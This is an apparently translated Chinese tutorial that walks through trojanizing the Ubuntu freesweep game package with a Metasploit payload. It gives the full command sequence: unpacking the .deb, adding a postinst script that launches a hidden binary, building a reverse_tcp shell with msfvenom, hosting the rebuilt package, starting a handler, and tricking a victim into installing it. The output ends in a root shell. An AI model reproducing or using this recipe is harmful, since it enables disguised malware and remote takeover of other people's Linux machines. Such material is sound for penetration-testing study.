为了证明客户端攻击和木马不是Windows专有的,我们将使用Ubuntu deb软件包将Metasploit有效载荷打包到Linux上。Redmeat_uk演示了这种技术。
我们首先需要下载我们要感染的软件包并将其移至临时工作目录。在我们的例子中,我们将使用freesweep包,一个基于文本的Mine Sweeper版本。
root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...略...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#
接下来,我们需要将软件包解压缩到工作目录,并创建一个DEBIAN目录来保存我们额外添加的“功能”。
root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN
在DEBIAN目录中,创建一个名为control的文件,其中包含以下内容:
root@kali:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
我们还需要创建一个将执行我们的二进制文件的安装后脚本。在我们的DEBIAN目录中,我们将创建一个名为postinst的文件,其中包含以下内容:
root@kali:/tmp/evil/work/DEBIAN# cat postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
现在我们将创建我们的恶意payload。我们将创建一个反向shell来连接名为freesweep_scores的我们。
root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
x86/shikata_ga_nai chosen with final size 98
Payload size: 98 bytes
Saved as: /tmp/evil/work/usr/games/freesweep_scores
我们现在将使我们的安装后脚本可执行并构建我们的新软件包。内置的文件将被命名为work.deb所以我们将要改变,要freesweep.deb和包复制到我们的网站根目录。
root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/
如果它尚未运行,我们需要启动Apache Web服务器。
root@kali:/tmp/evil# service apache2 start
我们需要设置Metasploit multi / handler来接收传入的连接。
root@kali:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y"
PAYLOAD => linux/x86/shell/reverse_tcp
LHOST => 192.168.1.101
LPORT => 443
[*] Started reverse handler on 192.168.1.101:443
[*] Starting the payload handler...
在我们的Ubuntu受害者机中,我们不知何故说服用户下载并安装我们的真棒新游戏。
ubuntu @ ubuntu:〜 $ wget http://192.168.1.101/freesweep.deb
ubuntu @ ubuntu:〜 $ sudo dpkg -i freesweep.deb
当受害者机安装并玩我们的游戏时,我们收到了一个shell!
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)
ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...略...
hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)
